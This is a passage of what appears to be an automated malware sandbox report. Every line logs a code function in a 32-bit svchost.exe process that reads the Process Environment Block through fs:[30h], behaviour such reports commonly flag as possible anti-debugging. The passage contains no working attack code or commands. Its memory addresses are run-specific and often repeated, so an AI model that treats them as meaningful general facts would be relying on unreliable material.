Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h] 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h] 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h] 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h] 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h] 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE12ED mov eax, dword ptr fs:[00000030h] 7_2_03BE12ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B402E1 mov eax, dword ptr fs:[00000030h] 7_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B402E1 mov eax, dword ptr fs:[00000030h] 7_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B402E1 mov eax, dword ptr fs:[00000030h] 7_2_03B402E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B2D3 mov eax, dword ptr fs:[00000030h] 7_2_03B2B2D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B2D3 mov eax, dword ptr fs:[00000030h] 7_2_03B2B2D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B2D3 mov eax, dword ptr fs:[00000030h] 7_2_03B2B2D3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5F2D0 mov eax, dword ptr fs:[00000030h] 7_2_03B5F2D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5F2D0 mov eax, dword ptr fs:[00000030h] 7_2_03B5F2D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 7_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 7_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 7_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 7_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3A2C3 mov eax, dword ptr fs:[00000030h] 7_2_03B3A2C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5B2C0 mov eax, dword ptr fs:[00000030h] 7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5B2C0 mov eax, dword ptr fs:[00000030h] 7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5B2C0 mov eax, dword ptr fs:[00000030h] 7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5B2C0 mov eax, dword ptr fs:[00000030h] 7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5B2C0 mov eax, dword ptr fs:[00000030h] 7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5B2C0 mov eax, dword ptr fs:[00000030h] 7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5B2C0 mov eax, dword ptr fs:[00000030h] 7_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B392C5 mov eax, dword ptr fs:[00000030h] 7_2_03B392C5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B392C5 mov eax, dword ptr fs:[00000030h] 7_2_03B392C5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2823B mov eax, dword ptr fs:[00000030h] 7_2_03B2823B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B67208 mov eax, dword ptr fs:[00000030h] 7_2_03B67208
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B67208 mov eax, dword ptr fs:[00000030h] 7_2_03B67208
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B59274 mov eax, dword ptr fs:[00000030h] 7_2_03B59274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B71270 mov eax, dword ptr fs:[00000030h] 7_2_03B71270
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B71270 mov eax, dword ptr fs:[00000030h] 7_2_03B71270
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h] 7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h] 7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h] 7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h] 7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h] 7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h] 7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h] 7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h] 7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h] 7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h] 7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h] 7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE0274 mov eax, dword ptr fs:[00000030h] 7_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B34260 mov eax, dword ptr fs:[00000030h] 7_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B34260 mov eax, dword ptr fs:[00000030h] 7_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B34260 mov eax, dword ptr fs:[00000030h] 7_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFD26B mov eax, dword ptr fs:[00000030h] 7_2_03BFD26B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BFD26B mov eax, dword ptr fs:[00000030h] 7_2_03BFD26B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2826B mov eax, dword ptr fs:[00000030h] 7_2_03B2826B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2A250 mov eax, dword ptr fs:[00000030h] 7_2_03B2A250
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C05227 mov eax, dword ptr fs:[00000030h] 7_2_03C05227
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEB256 mov eax, dword ptr fs:[00000030h] 7_2_03BEB256
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEB256 mov eax, dword ptr fs:[00000030h] 7_2_03BEB256
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B36259 mov eax, dword ptr fs:[00000030h] 7_2_03B36259
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B29240 mov eax, dword ptr fs:[00000030h] 7_2_03B29240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B29240 mov eax, dword ptr fs:[00000030h] 7_2_03B29240
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6724D mov eax, dword ptr fs:[00000030h] 7_2_03B6724D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4B1B0 mov eax, dword ptr fs:[00000030h] 7_2_03B4B1B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C051CB mov eax, dword ptr fs:[00000030h] 7_2_03C051CB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE11A4 mov eax, dword ptr fs:[00000030h] 7_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE11A4 mov eax, dword ptr fs:[00000030h] 7_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE11A4 mov eax, dword ptr fs:[00000030h] 7_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BE11A4 mov eax, dword ptr fs:[00000030h] 7_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB019F mov eax, dword ptr fs:[00000030h] 7_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB019F mov eax, dword ptr fs:[00000030h] 7_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB019F mov eax, dword ptr fs:[00000030h] 7_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB019F mov eax, dword ptr fs:[00000030h] 7_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2A197 mov eax, dword ptr fs:[00000030h] 7_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2A197 mov eax, dword ptr fs:[00000030h] 7_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2A197 mov eax, dword ptr fs:[00000030h] 7_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C061E5 mov eax, dword ptr fs:[00000030h] 7_2_03C061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B70185 mov eax, dword ptr fs:[00000030h] 7_2_03B70185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEC188 mov eax, dword ptr fs:[00000030h] 7_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BEC188 mov eax, dword ptr fs:[00000030h] 7_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B601F8 mov eax, dword ptr fs:[00000030h] 7_2_03B601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h] 7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h] 7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h] 7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h] 7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h] 7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h] 7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h] 7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h] 7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h] 7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h] 7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h] 7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h] 7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B551EF mov eax, dword ptr fs:[00000030h] 7_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B351ED mov eax, dword ptr fs:[00000030h] 7_2_03B351ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6D1D0 mov eax, dword ptr fs:[00000030h] 7_2_03B6D1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6D1D0 mov ecx, dword ptr fs:[00000030h] 7_2_03B6D1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF61C3 mov eax, dword ptr fs:[00000030h] 7_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF61C3 mov eax, dword ptr fs:[00000030h] 7_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B31131 mov eax, dword ptr fs:[00000030h] 7_2_03B31131
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B31131 mov eax, dword ptr fs:[00000030h] 7_2_03B31131
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B136 mov eax, dword ptr fs:[00000030h] 7_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B136 mov eax, dword ptr fs:[00000030h] 7_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B136 mov eax, dword ptr fs:[00000030h] 7_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2B136 mov eax, dword ptr fs:[00000030h] 7_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C05152 mov eax, dword ptr fs:[00000030h] 7_2_03C05152
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B60124 mov eax, dword ptr fs:[00000030h] 7_2_03B60124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BDA118 mov ecx, dword ptr fs:[00000030h] 7_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BDA118 mov eax, dword ptr fs:[00000030h] 7_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BDA118 mov eax, dword ptr fs:[00000030h] 7_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BDA118 mov eax, dword ptr fs:[00000030h] 7_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF0115 mov eax, dword ptr fs:[00000030h] 7_2_03BF0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F172 mov eax, dword ptr fs:[00000030h] 7_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC9179 mov eax, dword ptr fs:[00000030h] 7_2_03BC9179
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B37152 mov eax, dword ptr fs:[00000030h] 7_2_03B37152
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2C156 mov eax, dword ptr fs:[00000030h] 7_2_03B2C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B36154 mov eax, dword ptr fs:[00000030h] 7_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B36154 mov eax, dword ptr fs:[00000030h] 7_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC4144 mov eax, dword ptr fs:[00000030h] 7_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC4144 mov eax, dword ptr fs:[00000030h] 7_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC4144 mov ecx, dword ptr fs:[00000030h] 7_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC4144 mov eax, dword ptr fs:[00000030h] 7_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BC4144 mov eax, dword ptr fs:[00000030h] 7_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B29148 mov eax, dword ptr fs:[00000030h] 7_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B29148 mov eax, dword ptr fs:[00000030h] 7_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B29148 mov eax, dword ptr fs:[00000030h] 7_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B29148 mov eax, dword ptr fs:[00000030h] 7_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF60B8 mov eax, dword ptr fs:[00000030h] 7_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF60B8 mov ecx, dword ptr fs:[00000030h] 7_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C050D9 mov eax, dword ptr fs:[00000030h] 7_2_03C050D9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B35096 mov eax, dword ptr fs:[00000030h] 7_2_03B35096
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5D090 mov eax, dword ptr fs:[00000030h] 7_2_03B5D090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5D090 mov eax, dword ptr fs:[00000030h] 7_2_03B5D090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B6909C mov eax, dword ptr fs:[00000030h] 7_2_03B6909C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B3208A mov eax, dword ptr fs:[00000030h] 7_2_03B3208A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2D08D mov eax, dword ptr fs:[00000030h] 7_2_03B2D08D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2C0F0 mov eax, dword ptr fs:[00000030h] 7_2_03B2C0F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B720F0 mov ecx, dword ptr fs:[00000030h] 7_2_03B720F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B550E4 mov eax, dword ptr fs:[00000030h] 7_2_03B550E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B550E4 mov ecx, dword ptr fs:[00000030h] 7_2_03B550E4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h] 7_2_03B2A0E3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B380E9 mov eax, dword ptr fs:[00000030h] 7_2_03B380E9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB20DE mov eax, dword ptr fs:[00000030h] 7_2_03BB20DE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B590DB mov eax, dword ptr fs:[00000030h] 7_2_03B590DB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov ecx, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov ecx, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov ecx, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov ecx, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B470C0 mov eax, dword ptr fs:[00000030h] 7_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF903E mov eax, dword ptr fs:[00000030h] 7_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF903E mov eax, dword ptr fs:[00000030h] 7_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF903E mov eax, dword ptr fs:[00000030h] 7_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BF903E mov eax, dword ptr fs:[00000030h] 7_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2A020 mov eax, dword ptr fs:[00000030h] 7_2_03B2A020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2C020 mov eax, dword ptr fs:[00000030h] 7_2_03B2C020
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03C05060 mov eax, dword ptr fs:[00000030h] 7_2_03C05060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E016 mov eax, dword ptr fs:[00000030h] 7_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E016 mov eax, dword ptr fs:[00000030h] 7_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E016 mov eax, dword ptr fs:[00000030h] 7_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B4E016 mov eax, dword ptr fs:[00000030h] 7_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov ecx, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B41070 mov eax, dword ptr fs:[00000030h] 7_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5C073 mov eax, dword ptr fs:[00000030h] 7_2_03B5C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B32050 mov eax, dword ptr fs:[00000030h] 7_2_03B32050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BD705E mov ebx, dword ptr fs:[00000030h] 7_2_03BD705E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BD705E mov eax, dword ptr fs:[00000030h] 7_2_03BD705E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5B052 mov eax, dword ptr fs:[00000030h] 7_2_03B5B052
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B5D7B0 mov eax, dword ptr fs:[00000030h] 7_2_03B5D7B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03B2F7BA mov eax, dword ptr fs:[00000030h] 7_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03BB97A9 mov eax, dword ptr fs:[00000030h] 7_2_03BB97A9
